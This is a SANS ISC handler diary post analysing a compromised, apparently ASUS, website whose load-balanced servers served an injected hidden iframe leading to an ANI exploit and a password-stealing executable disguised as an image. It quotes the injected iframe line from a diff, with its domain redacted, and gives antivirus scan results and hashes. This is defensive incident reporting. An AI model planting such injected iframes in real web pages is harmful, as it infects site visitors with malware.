Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: InfoSec Handlers Diary Blog InfoSec Handlers Diary Blog

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free! exploited

Published: 2007-04-06
Last Updated: 2007-04-07 17:48:47 UTC
by Swa Frantzen (Version: 2)
0 comment(s)

In the past days a handful of readers had sent us notes that was compromised. We unfortunately could not find anything wrong in the html at all.

Today the kaspersky blog had an entry about a ANI exploit loaded via an iframe at

So we fetch a new copy, still nothing to be seen. Until Johannes suggested might be load balanced, and yes indeed it seems it is using DNS load balancing:

$ dig a

; <<>> DiG 9.2.3 <<>> a
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 19075
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 0

; IN A

;; ANSWER SECTION: 14400 IN A 14400 IN A


;; Query time: 18 msec
;; WHEN: Fri Apr 6 23:33:01 2007
;; MSG SIZE rcvd: 96

Fetching a copy of the home page of both servers, and comparing the resulting page yields:

(line breaks added to make page easier to read)

$ diff index.html index.html.1 
</table><iframe src=http://[DELETED].com/app/
width=100 height=0></iframe>

Just goes to learn that a load balanced site is a pain to investigate if only some of the servers are affected.

The script at the time we looked at it was obfuscated and leads to a VBscript, that's up to no good pointing to another obfuscated javascript and a executable cloaked as a jpg file.

That file gives following over at virustotal:

Antivirus Version Update Result
AhnLab-V3 2007.4.7.0 20070406 -
AntiVir 20070406 TR/Drop.Ag.344576.B
Authentium 4.93.8 20070406 Possibly a new variant of W32/PWStealer.gen1
Avast 4.7.936.0 20070406 Win32:Tibs-ADO
AVG 20070405 -
BitDefender 7.2 20070406 -
CAT-QuickHeal 9.00 20070406 (Suspicious) - DNAScan
ClamAV devel-20070312 20070406 -
DrWeb 4.33 20070406 -
eSafe 20070406 suspicious Trojan/Worm
eTrust-Vet 30.7.3546 20070406 Win32/NSAnti
Ewido 4.0 20070406 -
F-Prot 20070404 W32/PWStealer.gen1
F-Secure 6.70.13030.0 20070406 -
FileAdvisor 1 20070407 -
Fortinet 20070406 suspicious
Ikarus T3.1.1.3 20070406 MalwareScope.Worm.Viking.3
Kaspersky 20070406
McAfee 5003 20070406 New Malware.bc
Microsoft 1.2405 20070406 -
NOD32v2 2171 20070406 -
Norman 5.80.02 20070405 -
Panda 20070406 Suspicious file
Prevx1 V2 20070407 -
Sophos 4.16.0 20070406 Mal/EncPk-F
Sunbelt 2.2.907.0 20070403 -
Symantec 10 20070406 -
TheHacker 20070404 -
VBA32 3.11.3 20070406 Trojan-PSW.Win32.Nilage.ara
VirusBuster 4.3.7:9 20070406 -
Webwasher-Gateway 6.0.1 20070406 Trojan.Drop.Ag.344576.B

Name next3.png
Size 100539
md5 42a248b8634da52d6044f87db9a8d794
sha1 cf612836be3c763ab9dc2c9afc0ccc112f2c2a04
Date scanned 04/07/2007 00:09:16 (CET)

Password stealer it seems, same old goal.

I've not seen an ANI exploit in there right now, but we can be easily looking at something that's dynamic in some other way as well.

It seems asus did take down the hacked server in the mean time.

That second javascript referred in the vbscript above didn't decode, it seems it's just not encoded right, but when decoding the string with a plain base64 routine, it does decode to what leads to an ANI exploit. You never know what a buggy script and a buggy browser do together.

Roger tested other language versions of the asus websites and there are more references to the first javascript with an iframe loading it out there.

Off to warn them once again...

Swa Frantzen -- NET2S


0 comment(s)
Diary Archives